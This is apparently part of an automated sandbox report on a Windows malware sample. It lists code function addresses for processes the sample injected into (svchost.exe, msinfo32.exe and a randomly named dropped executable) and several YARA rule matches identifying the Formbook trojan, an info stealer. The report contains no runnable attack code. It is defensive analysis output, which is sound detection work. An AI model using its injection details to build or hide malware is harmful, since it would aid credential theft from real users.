Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004011F0	1_2_004011F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004102C3	1_2_004102C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004032E0	1_2_004032E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E343	1_2_0040E343
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402510	1_2_00402510
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040E51B	1_2_0040E51B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416E2E	1_2_00416E2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416E33	1_2_00416E33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384E3F0	1_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039003E6	1_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FA352	1_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C02C0	1_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0274	1_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F41A2	1_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039001AA	1_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F81CC	1_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830100	1_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DA118	1_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038C8158	1_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D2000	1_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383C7C0	1_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03864750	1_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840770	1_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385C6E0	1_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03900591	1_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840535	1_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EE4F6	1_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E4420	1_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F2446	1_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F6BD7	1_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FAB40	1_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383EA80	1_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038429A0	1_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0390A9A6	1_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03856962	1_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038268B8	1_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0386E8F0	1_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384A840	1_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03842840	1_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038BEFA0	1_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03832FC8	1_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03882F28	1_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03860F30	1_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E2F30	1_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B4F40	1_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03852E90	1_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FCE93	1_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FEEDB	1_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FEE26	1_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840E59	1_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03858DBF	1_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0383ADE0	1_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384AD00	1_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DCD1F	1_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E0CB5	1_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03830CF2	1_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03840C00	1_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0388739A	1_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F132D	1_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382D34C	1_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038452A0	1_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385B2C0	1_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E12ED	1_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385D2F0	1_2_0385D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0384B1B0	1_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387516C	1_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0382F172	1_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0390B16B	1_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EF0CC	1_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038470C0	1_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F70E9	1_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FF0E0	1_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FF7B0	1_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F16CC	1_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DD5B0	1_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F7571	1_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FF43F	1_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03831460	1_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385FB80	1_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B5BF0	1_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0387DBF9	1_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFB76	1_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038DDAAC	1_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03885AA0	1_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038E1AA3	1_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038EDAC6	1_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFA49	1_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F7A46	1_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B3A6C	1_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038D5910	1_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03849950	1_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385B950	1_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038438E0	1_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038AD800	1_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03841F92	1_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFFB1	1_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFF09	1_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03849EB0	1_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0385FDC0	1_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03843D40	1_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F1D5A	1_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038F7D73	1_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038FFCF2	1_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_038B9C32	1_2_038B9C32
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_04256000	5_2_04256000
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_04257DBB	5_2_04257DBB
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_0427661B	5_2_0427661B
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_04257FDB	5_2_04257FDB
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_0425601F	5_2_0425601F
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_0425605B	5_2_0425605B
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_04256233	5_2_04256233
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_0425EB46	5_2_0425EB46
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_0425EB4B	5_2_0425EB4B
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073C7748	5_2_073C7748
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073C7570	5_2_073C7570
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073C94F0	5_2_073C94F0
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073E7B30	5_2_073E7B30
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073CE390	5_2_073CE390
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073C92D0	5_2_073C92D0
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073D0060	5_2_073D0060
Source: C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe	Code function: 5_2_073D005B	5_2_073D005B
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D1E4F6	6_2_04D1E4F6
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D22446	6_2_04D22446
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D14420	6_2_04D14420
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D30591	6_2_04D30591
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C70535	6_2_04C70535
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C8C6E0	6_2_04C8C6E0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C6C7C0	6_2_04C6C7C0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C94750	6_2_04C94750
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C70770	6_2_04C70770
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D02000	6_2_04D02000
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D281CC	6_2_04D281CC
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D241A2	6_2_04D241A2
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D301AA	6_2_04D301AA
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CF8158	6_2_04CF8158
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C60100	6_2_04C60100
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D0A118	6_2_04D0A118
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CF02C0	6_2_04CF02C0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D10274	6_2_04D10274
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D303E6	6_2_04D303E6
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C7E3F0	6_2_04C7E3F0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2A352	6_2_04D2A352
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C60CF2	6_2_04C60CF2
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D10CB5	6_2_04D10CB5
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C70C00	6_2_04C70C00
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C6ADE0	6_2_04C6ADE0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C88DBF	6_2_04C88DBF
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C7AD00	6_2_04C7AD00
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D0CD1F	6_2_04D0CD1F
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2EEDB	6_2_04D2EEDB
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2CE93	6_2_04D2CE93
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C82E90	6_2_04C82E90
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C70E59	6_2_04C70E59
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2EE26	6_2_04D2EE26
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C62FC8	6_2_04C62FC8
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CEEFA0	6_2_04CEEFA0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CE4F40	6_2_04CE4F40
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D12F30	6_2_04D12F30
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CB2F28	6_2_04CB2F28
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C90F30	6_2_04C90F30
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C9E8F0	6_2_04C9E8F0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C568B8	6_2_04C568B8
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C72840	6_2_04C72840
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C7A840	6_2_04C7A840
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C729A0	6_2_04C729A0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D3A9A6	6_2_04D3A9A6
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C86962	6_2_04C86962
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C6EA80	6_2_04C6EA80
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D26BD7	6_2_04D26BD7
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2AB40	6_2_04D2AB40
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C61460	6_2_04C61460
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2F43F	6_2_04D2F43F
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D395C3	6_2_04D395C3
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D0D5B0	6_2_04D0D5B0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D27571	6_2_04D27571
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D216CC	6_2_04D216CC
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CB5630	6_2_04CB5630
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2F7B0	6_2_04D2F7B0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C770C0	6_2_04C770C0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D1F0CC	6_2_04D1F0CC
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2F0E0	6_2_04D2F0E0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D270E9	6_2_04D270E9
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C7B1B0	6_2_04C7B1B0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CA516C	6_2_04CA516C
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C5F172	6_2_04C5F172
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D3B16B	6_2_04D3B16B
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C8B2C0	6_2_04C8B2C0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C8D2F0	6_2_04C8D2F0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D112ED	6_2_04D112ED
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C752A0	6_2_04C752A0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CB739A	6_2_04CB739A
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C5D34C	6_2_04C5D34C
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2132D	6_2_04D2132D
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2FCF2	6_2_04D2FCF2
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CE9C32	6_2_04CE9C32
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C8FDC0	6_2_04C8FDC0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C73D40	6_2_04C73D40
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D21D5A	6_2_04D21D5A
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D27D73	6_2_04D27D73
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C79EB0	6_2_04C79EB0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C33FD2	6_2_04C33FD2
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C33FD5	6_2_04C33FD5
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C71F92	6_2_04C71F92
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2FFB1	6_2_04D2FFB1
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2FF09	6_2_04D2FF09
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C738E0	6_2_04C738E0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CDD800	6_2_04CDD800
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C79950	6_2_04C79950
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C8B950	6_2_04C8B950
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D05910	6_2_04D05910
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D1DAC6	6_2_04D1DAC6
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CB5AA0	6_2_04CB5AA0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D11AA3	6_2_04D11AA3
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D0DAAC	6_2_04D0DAAC
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D27A46	6_2_04D27A46
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2FA49	6_2_04D2FA49
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CE3A6C	6_2_04CE3A6C
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CADBF9	6_2_04CADBF9
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04CE5BF0	6_2_04CE5BF0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04C8FB80	6_2_04C8FB80
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04D2FB76	6_2_04D2FB76
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C11C00	6_2_02C11C00
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C0CB40	6_2_02C0CB40
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C0AFB8	6_2_02C0AFB8
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C0ADE0	6_2_02C0ADE0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C0CD60	6_2_02C0CD60
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C2B3A0	6_2_02C2B3A0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C138CB	6_2_02C138CB
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_02C138D0	6_2_02C138D0
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04B2E4B3	6_2_04B2E4B3
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04B2E394	6_2_04B2E394
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04B2D8B8	6_2_04B2D8B8
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04B2E84C	6_2_04B2E84C
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: 6_2_04B2CB53	6_2_04B2CB53

Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: String function: 002F0D27 appears 70 times
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: String function: 002D7F41 appears 35 times
Source: C:\Users\user\Desktop\6ddrUd6iQo.exe	Code function: String function: 002F8B40 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 99 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 103 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: String function: 04CEF290 appears 103 times
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: String function: 04CDEA12 appears 86 times
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: String function: 04CA5130 appears 58 times
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: String function: 04C5B970 appears 262 times
Source: C:\Windows\SysWOW64\msinfo32.exe	Code function: String function: 04CB7E54 appears 107 times

Source: 6ddrUd6iQo.exe, 00000000.00000003.1659078466.0000000004313000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 6ddrUd6iQo.exe
Source: 6ddrUd6iQo.exe, 00000000.00000003.1660061845.00000000044BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 6ddrUd6iQo.exe

Source: 6ddrUd6iQo.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2027814495.0000000007CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3511321402.00000000040D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2024875741.0000000005990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
